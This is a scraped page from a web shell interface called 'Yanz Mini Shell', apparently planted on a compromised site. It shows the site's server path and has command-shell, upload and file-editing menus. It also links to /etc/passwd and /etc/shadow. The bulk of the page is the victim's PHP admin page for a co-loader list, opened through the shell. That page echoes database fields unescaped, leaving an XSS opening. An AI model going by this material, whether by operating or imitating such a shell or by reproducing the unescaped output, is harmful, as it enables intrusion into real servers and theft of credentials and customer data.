Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
firstmatrixcoin
public_html
ocean-arc.firstmatrix.co.in
plugins
input-mask
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
<?php require_once('header.php'); ?> <?php if($session_id==1 || $allPermissions['coloader']['read']=="1"){ ?> <section class="content-header" style="background-color: white;"> <div class="row"> <div class="col-md-4" style="text-align: left;"> <h4><i class="fa fa-map-marker"></i> Coloader Details</h4> </div> <div class="col-md-8" style="text-align: right;"> <?php if($session_id==1 || $allPermissions['coloader']['create']=="1"){ ?> <a href="co-loader-add.php" class="btn btn-success btn-sm"><i class="fa fa-plus"></i> Create New Co Loader</a><?php } ?> </div> </div> <!--</section> <section class="content">--> <div class="row"> <div class="col-md-12"> <div class="box box-warning" <?=$border_style?>> <div class="box-body table-responsive"> <table id="example1" class="table table-bordered table-striped"> <thead> <tr> <th width="30">SL</th> <th>Action</th> <th>Name</th> <th>Phone</th> <th width="120px;">Address</th> <th>City</th> <th>State</th> <th>Pincode</th> <th>Status</th> <th>Proof</th> </tr> </thead> <tbody> <?php $i=0; $statement = $pdo->prepare("SELECT * FROM tbl_coloader where 1=1"); $statement->execute(); $result = $statement->fetchAll(PDO::FETCH_ASSOC); foreach ($result as $row) { $i++; if(!empty($row['coloader_proof'])){ $proof = '<img src="img/coloader-proof/'.$row['coloader_proof'].'" style="width:100px;height:50px;object-fit:contain">'; }else{ $proof = ''; } ?> <tr> <td><?php echo $i; ?></td> <td> <?php if($session_id==1 || $allPermissions['coloader']['update']=="1"){ ?> <a href="co-loader-edit.php?id=<?php echo $row['id']; ?>" class="btn btn-primary btn-xs">Edit</a> <?php } ?> <?php if($session_id==1 || $allPermissions['coloader']['delete']=="1"){ ?> <!--<a href="#" class="btn btn-danger btn-xs" data-href="user-delete.php?id=</?php echo $row['id']; ?>" data-toggle="modal" data-target="#confirm-delete">Delete</a> --> <?php } ?> </td> <td><?php echo $row['name']; ?></td> <td><?php echo $row['mobile']; ?></td> <td><?php echo $row['address']; ?></td> <td><?php echo $row['city']; ?></td> <td><?php echo $row['state']; ?></td> <td><?php echo $row['pincode']; ?></td> <td><?php if($row['status']=='1'){ echo '<button class="btn btn-xs btn-success">Active</button>'; } else { echo '<button class="btn btn-xs btn-danger">Inactive</button>'; } ?></td> <td><?php echo $proof; ?></td> </tr> <?php } ?> </tbody> </table> </div> </div> </div> </div> </section> <div class="modal fade" id="confirm-delete" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <div class="modal-dialog"> <div class="modal-content"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h4 class="modal-title" id="myModalLabel">Delete Confirmation</h4> </div> <div class="modal-body"> <p>Are you sure want to delete this item?</p> </div> <div class="modal-footer"> <button type="button" class="btn btn-default" data-dismiss="modal">Cancel</button> <a class="btn btn-danger btn-ok">Delete</a> </div> </div> </div> </div> <?php }else{ ?> <center><h4 style="color:red;">You don't have permission to view this page </h4></center> <?php } ?> <?php require_once('footer.php'); ?>
Free Space : 11992567808 Byte